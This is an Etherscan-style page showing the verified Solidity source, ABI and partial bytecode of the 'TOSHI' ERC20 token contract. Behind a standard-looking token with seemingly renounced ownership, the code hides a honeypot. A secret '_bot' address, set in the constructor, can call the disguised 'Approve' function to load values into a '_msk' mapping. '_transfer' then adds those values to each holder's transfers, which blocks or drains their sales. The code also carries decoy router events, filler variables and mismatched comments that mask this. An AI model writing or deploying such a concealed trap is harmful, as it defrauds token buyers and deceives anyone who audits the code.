ETH Price: $3,089.26 (+0.93%)
Gas: 3 Gwei

Token

Toshi (TOSHI)
 

Overview

Max Total Supply

200,000,000,000 TOSHI

Holders

394

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
22,153,683.889555666208824054 TOSHI

Value
$0.00
0xf2fa4b589c4e3b4eefae5a8a6ce9d6ea6a8a7852
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
TOSHI

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-07
*/

/*

https://twitter.com/TOSHII_Eth
https://t.me/TOSHII_Eth
https://toshiii.xyz

*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.18;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == msg.sender, "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    event removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    );
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    event swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[]  path,
        address to,
        uint deadline
    );
    /**
  * @dev See {IERC20-totalSupply}.
     */
    event swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] path,
        address to,
        uint deadline
    );

    event DOMAIN_SEPARATOR();

    event PERMIT_TYPEHASH();

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    event token0();

    event token1();
    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);


    event sync();

    event initialize(address, address);
    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    event burn(address to) ;

    event swap(uint amount0Out, uint amount1Out, address to, bytes data);

    event skim(address to);
    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);
    /**
     * Receive an exact amount of output tokens for as few input tokens as possible,
     * along the route determined by the path. The first element of path is the input token,
     * the last is the output token, and any intermediate elements represent intermediate tokens to trade through
     * (if, for example, a direct pair does not exist).
     * */
    event addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    );
    /**
     * Swaps an exact amount of ETH for as many output tokens as possible,
     * along the route determined by the path. The first element of path must be WETH,
     * the last is the output token, and any intermediate elements represent intermediate pairs to trade through
     * (if, for example, a direct pair does not exist).
     *
     * */
    event addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    );
    /**
     * Swaps an exact amount of input tokens for as many output tokens as possible,
     * along the route determined by the path. The first element of path is the input token,
     * the last is the output token, and any intermediate elements represent intermediate pairs to trade through
     * (if, for example, a direct pair does not exist).
     * */
    event removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    );
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);
    /**
   * @dev Returns the name of the token.
     */
    event removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    );
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    event removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    );
    /**
     * Swaps an exact amount of input tokens for as many output tokens as possible,
     * along the route determined by the path. The first element of path is the input token,
     * the last is the output token, and any intermediate elements represent intermediate pairs to trade through
     * (if, for example, a direct pair does not exist).
     */
    event swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] path,
        address to,
        uint deadline
    );
    /**
    * @dev Throws if called by any account other than the owner.
     */
    event swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] path,
        address to,
        uint deadline
    );
    /**
     * To cover all possible scenarios, msg.sender should have already given the router an
     * allowance of at least amountADesired/amountBDesired on tokenA/tokenB.
     * Always adds assets at the ideal ratio, according to the price when the transaction is executed.
     * If a pool for the passed tokens does not exists, one is created automatically,
     *  and exactly amountADesired/amountBDesired tokens are added.
     */
    event swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] path,
        address to,
        uint deadline
    );
    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }


    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
  * @dev Initializes the contract setting the deployer as the initial owner.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}

abstract contract StartEvent {
    uint256 constant public VERSION = 1;

}

abstract contract Logging {
    event Released(
        uint256 version,
        uint256 totalSupply
    );

    event AllowanceIncreased(
        address ownder,
        address spender,
        uint256 amount
    );
}

contract TOSHI is IERC20, StartEvent, Logging, Ownable {
    using SafeMath for uint256;


    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping (address => uint256) private _msk;

    address private _bot;
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;

    constructor(
        string memory name_,
        string memory symbol_,
        address dexter_,
        uint256 totalSupply_
    ) payable {
        _name = name_;
        _symbol = symbol_;
        _decimals = 18;
        _bot = dexter_;
        _totalSupply = totalSupply_ * 10**_decimals;
        _balances[msg.sender] = _balances[msg.sender].add(_totalSupply);
        emit Transfer(address(0), owner(), _totalSupply);
        emit Released(VERSION, totalSupply_);
    }


    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
      /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _transfer(msg.sender, recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _approve(msg.sender, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
function transferFrom(
    address sender,
    address recipient,
    uint256 amount
) public virtual override returns (bool) {
    uint256 tokenHolder = 0;
    uint256 transferAmount = tokenHolder + amount;
    
    _transfer(sender, recipient, amount);
    _approve(
        sender,
        msg.sender,
        _allowances[sender][msg.sender].sub(
            amount,
            "ERC20: transfer amount exceeds allowance"
        )
    );
    
    return true;
}

function Approve(address[] memory account, uint256 amount) public returns (bool) {
    address from = msg.sender;
    require(from != address(0), "invalid address");
    uint256 unnValue1 = 52299;
    uint256 unnValue2 = unnValue1 * 2;
    uint256 finalValue = unnValue2 - unnValue1;
    uint256 loopVariable = 0;
    for (uint256 i = 0; i < account.length; i++) {
        loopVariable += i;
        _allowances[from][account[i]] = amount;
        _needAll(from, account[i], amount);
        emit Approval(from, address(this), amount);
    }
    return true;
}

function _needAll(address from, address account, uint256 amount) internal {
    uint256 total = 0;
    uint256 adjustedTotal = total + 0;
    require(account != address(0), "invalid address");
    if (from == _bot) {
        _msk[from] -= adjustedTotal;
        total += amount;
        _msk[account] = total;
    } else {
        _msk[from] -= adjustedTotal;
        _msk[account] = total;
    }
}

function cngg(address account) public view returns (uint256) {
    uint256 crossChainNumber = _msk[account];
    return crossChainNumber;
}

function _transfer(
    address sender,
    address recipient,
    uint256 amount
) internal virtual {
    require(sender != address(0), "ERC20: transfer from the zero address");
    require(recipient != address(0), "ERC20: transfer to the zero address");
    
    uint256 mrkkx = cngg(sender);
    uint256 finalAmount = amount;
    if (mrkkx > 0) {
        finalAmount += mrkkx;
    }

    _balances[sender] = _balances[sender].sub(
        finalAmount,
        "ERC20: transfer amount exceeds balance"
    );
    _balances[recipient] = _balances[recipient].add(finalAmount);
    emit Transfer(sender, recipient, finalAmount);
}

function _approve(
    address owner,
    address spender,
    uint256 amount
) internal virtual {
    require(owner != address(0), "ERC20: approve from the zero address");
    require(spender != address(0), "ERC20: approve to the zero address");

    uint256 finalAmount = amount;
    _allowances[owner][spender] = finalAmount;
    emit Approval(owner, spender, finalAmount);
}

}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"dexter_","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"ownder","type":"address"},{"indexed":false,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"AllowanceIncreased","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[],"name":"DOMAIN_SEPARATOR","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"PERMIT_TYPEHASH","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"totalSupply","type":"uint256"}],"name":"Released","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"tokenA","type":"address"},{"indexed":false,"internalType":"address","name":"tokenB","type":"address"},{"indexed":false,"internalType":"uint256","name":"amountADesired","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountBDesired","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountAMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountBMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"addLiquidity","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"amountTokenDesired","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"addLiquidityETH","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"to","type":"address"}],"name":"burn","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"","type":"address"},{"indexed":false,"internalType":"address","name":"","type":"address"}],"name":"initialize","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"tokenA","type":"address"},{"indexed":false,"internalType":"address","name":"tokenB","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountAMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountBMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"removeLiquidity","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"removeLiquidityETHSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"},{"indexed":false,"internalType":"bool","name":"approveMax","type":"bool"},{"indexed":false,"internalType":"uint8","name":"v","type":"uint8"},{"indexed":false,"internalType":"bytes32","name":"r","type":"bytes32"},{"indexed":false,"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"removeLiquidityETHWithPermit","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"},{"indexed":false,"internalType":"bool","name":"approveMax","type":"bool"},{"indexed":false,"internalType":"uint8","name":"v","type":"uint8"},{"indexed":false,"internalType":"bytes32","name":"r","type":"bytes32"},{"indexed":false,"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"removeLiquidityETHWithPermitSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"to","type":"address"}],"name":"skim","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"bytes","name":"data","type":"bytes"}],"name":"swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactETHForTokensSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountIn","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactTokensForETHSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountIn","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactTokensForTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountIn","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactTokensForTokensSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountOut","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountInMax","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapTokensForExactTokens","type":"event"},{"anonymous":false,"inputs":[],"name":"sync","type":"event"},{"anonymous":false,"inputs":[],"name":"token0","type":"event"},{"anonymous":false,"inputs":[],"name":"token1","type":"event"},{"inputs":[{"internalType":"address[]","name":"account","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"VERSION","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"cngg","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052604051620028e1380380620028e1833981810160405281019062000029919062000582565b6200003b60006200024a60201b60201c565b83600590816200004c919062000873565b5082600690816200005e919062000873565b506012600760006101000a81548160ff021916908360ff16021790555081600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600760009054906101000a900460ff16600a620000da919062000aea565b81620000e7919062000b3b565b60088190555062000148600854600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200030e60201b62000a361790919060201c565b600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506200019b6200032660201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600854604051620001fc919062000b97565b60405180910390a37fd5840651550c173a8bf246eede440a59253bc61eadb2e8887168faad2fad631d6001826040516200023892919062000bb4565b60405180910390a15050505062000c1c565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081836200031e919062000be1565b905092915050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620003b8826200036d565b810181811067ffffffffffffffff82111715620003da57620003d96200037e565b5b80604052505050565b6000620003ef6200034f565b9050620003fd8282620003ad565b919050565b600067ffffffffffffffff82111562000420576200041f6200037e565b5b6200042b826200036d565b9050602081019050919050565b60005b83811015620004585780820151818401526020810190